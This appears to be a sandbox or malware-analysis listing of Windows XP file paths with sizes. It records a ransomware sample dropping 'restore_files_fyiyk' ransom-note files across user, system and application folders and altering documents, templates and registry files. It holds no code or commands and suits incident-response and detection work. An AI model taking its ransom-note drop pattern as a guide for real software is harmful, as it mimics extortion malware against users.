%Documents and Settings%\Default User\Templates\excel.xls (427 bytes)
%Documents and Settings%\Default User\Application Data\Microsoft\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\3\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\41\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Adobe\Acrobat\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\NetworkService\Application Data\Microsoft\SystemCertificates\My\Certificates\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\0\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\23\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\17\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\LocalService\Application Data\Microsoft\Internet Explorer\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Windows\Themes\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\NetworkService\Local Settings\Application Data\Microsoft\Windows\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\Accessories\Accessibility\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\33\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\GHISLER\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\All Users\Documents\My Music\Sample Music\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Adobe\Flash Player\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\All Users\Documents\My Music\Sample Music\Beethoven's Symphony No. 9 (Scherzo).wma (6148 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\20\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\SystemCertificates\My\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\All Users\Documents\My Music\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\All Users\Documents\My Videos\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\32\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\LocalService\Application Data\Microsoft\SystemCertificates\My\CRLs\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\Default User\Cookies\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\All Users\Documents\My Music\Sample Music\New Stories (Highway Blues).wma (7698 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\57\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\52\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\Accessories\System Tools\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\Default User\Start Menu\Programs\Accessories\Entertainment\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\LocalService\Application Data\Microsoft\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\S96BCDQ7\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\NetworkService\Application Data\Microsoft\SystemCertificates\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\23\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\62\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\35\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\9\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Microsoft\Media Player\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\AU\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\eng\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\56\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\NetworkService\Local Settings\Application Data\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\tmp\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\20\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\28\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\VMware\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\37\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\46\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\All Users\Documents\My Pictures\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Macromedia\Flash Player\#SharedObjects\QEA5Z3QJ\kiks.yandex.ru\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\NetworkService\Application Data\Microsoft\SystemCertificates\My\CTLs\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\51\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\NetworkService\Local Settings\History\History.IE5\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\VMware\VMware Tools\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\56\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\62\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\1\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\Default User\Local Settings\History\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\7\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\33\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Windows\Themes\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\Default User\Start Menu\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\Default User\Local Settings\Temporary Internet Files\Content.IE5\S96BCDQ7\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\0\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\48\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Internet Explorer\brndlog.txt (436 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\38\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\All Users\Documents\My Music\Sample Playlists\00064D96\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\QLSNQ10Z\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\SystemCertificates\My\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\Default User\Cookies\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\Default User\Templates\winword2.doc (419 bytes)
%Documents and Settings%\Default User\Local Settings\Temp\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\58\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\38\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\24\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\3\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\Default User\Application Data\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Microsoft\Windows Media\9.0\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\49\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\Default User\Local Settings\Application Data\Microsoft\Windows Media\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\35\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\all\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Microsoft\Windows\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\Default User\Local Settings\Application Data\Microsoft\Windows Media\9.0\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\42\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\27\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Adobe\Acrobat\9.0\Collab\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\20\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\28\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Adobe\Acrobat\9.0\Cache\Search\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\57\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Start Menu\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\44\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Crypto\RSA\S-1-5-21-1844237615-1960408961-1801674531-1003\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\23\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\LocalService\Local Settings\Application Data\Microsoft\restore_files_fyiyk.txt (2 bytes)
C:\RECYCLER\S-1-5-21-1844237615-1960408961-1801674531-1003\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\Accessories\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\Default User\NetHood\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Adobe\Acrobat\9.0\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\All Users\Documents\My Pictures\Sample Pictures\Sunset.jpg (1157 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\50\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\44\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Templates\excel.xls (427 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\9\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\NetworkService\Application Data\Microsoft\Media Player\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\Default User\Application Data\Microsoft\Internet Explorer\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\UserData\2Z89WTQV\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Macromedia\Flash Player\#SharedObjects\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Favorites\Links\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Templates\powerpnt.ppt (454 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Crypto\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\28\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\59\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Templates\quattro.wb2 (430 bytes)
%Documents and Settings%\Default User\Start Menu\Programs\Startup\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\2\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\host\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\All Users\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\Default User\Local Settings\Application Data\Microsoft\Media Player\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\MMC\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\26\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\NetworkService\Application Data\Microsoft\SystemCertificates\My\CTLs\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\Default User\PrintHood\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\NetworkService\Application Data\Microsoft\Internet Explorer\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\18\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\56\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\42\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\812Z098J\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Adobe\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\Default User\Application Data\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\All Users\DRM\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\All Users\Start Menu\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Identities\{37E80C13-CB45-4DCE-A438-545B791476AC}\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\61\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\34\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\NetworkService\Application Data\Microsoft\SystemCertificates\My\restore_files_fyiyk.txt (2 bytes)
C:\totalcmd\REGISTER.RTF (421 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\13\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\39\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Templates\excel4.xls (419 bytes)
%Documents and Settings%\%current user%\Application Data\Macromedia\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\tmp\si\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\NetworkService\Local Settings\Application Data\Microsoft\Credentials\S-1-5-20\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\LocalService\Application Data\Microsoft\Internet Explorer\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\UserData\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\34\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\NetworkService\Local Settings\Application Data\Microsoft\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\60\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Protect\S-1-5-21-1844237615-1960408961-1801674531-1003\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\NetworkService\Local Settings\History\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\58\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\NetworkService\Application Data\Microsoft\Media Player\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\27\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\38\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\33\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\9\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\O167C5I7\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\All Users\DRM\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\Default User\Local Settings\Application Data\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\37\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\Default User\Local Settings\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\17\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\4\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\All Users\Favorites\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\10\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\38\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Adobe\Acrobat\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\60\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\All Users\Documents\My Music\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\Default User\Start Menu\Programs\Accessories\Accessibility\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\VMware\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Adobe\Flash Player\AssetCache\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\43\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\All Users\Documents\My Music\Sample Playlists\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\UserData\2Z89WTQV\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\46\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\Default User\Local Settings\Application Data\Microsoft\Windows Media\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Adobe\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\LocalService\Local Settings\Application Data\Microsoft\Credentials\S-1-5-19\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\UserData\4XCFALMJ\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\53\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\4\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Adobe\Flash Player\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\20\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Templates\winword2.doc (419 bytes)
%Documents and Settings%\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\Total Commander\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Adobe\Color\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\36\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Macromedia\Flash Player\macromedia.com\support\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\30\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\49\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\42\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\39\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\Default User\Local Settings\Temporary Internet Files\Content.IE5\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\Accessories\Entertainment\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\Games\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\Default User\Favorites\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\6\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\LocalService\Local Settings\Application Data\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\24\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Adobe\Reader 9.3\Setup Files\Reader9\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Microsoft\Windows Media\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\Accessories\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\31\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\Default User\Local Settings\History\History.IE5\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\host\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\43\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Adobe\Linguistics\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\Default User\Start Menu\Programs\Accessories\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\41\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\24\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Microsoft\Credentials\S-1-5-21-1844237615-1960408961-1801674531-1003\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\13\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Internet Explorer\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\NTUSER.DAT (10724 bytes)
%Documents and Settings%\NetworkService\Local Settings\Application Data\Microsoft\Windows\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Adobe\Updater6\Install\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Protect\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Macromedia\Flash Player\#SharedObjects\QEA5Z3QJ\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\#kiks.yandex.ru\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Templates\wordpfct.wpd (892 bytes)
%Documents and Settings%\%current user%\Favorites\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\32\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\21\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Media Player\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\LocalService\Application Data\Microsoft\Credentials\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\10\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\57\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\Default User\Application Data\Microsoft\Media Player\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\50\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\40\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\SystemCertificates\My\CRLs\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\50\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\61\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\15\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\All Users\Documents\My Pictures\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\NetworkService\Application Data\Microsoft\Credentials\restore_files_fyiyk.txt (2 bytes)
%System%\config\SOFTWARE.LOG (4454 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\15\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Adobe\Acrobat\9.0\JavaScripts\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\63\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Crypto\RSA\restore_files_fyiyk.html (5 bytes)
C:\totalcmd\HISTORY.TXT (3890 bytes)
%Documents and Settings%\Default User\Templates\winword.doc (426 bytes)
%Documents and Settings%\NetworkService\Local Settings\Temporary Internet Files\restore_files_fyiyk.txt (2 bytes)
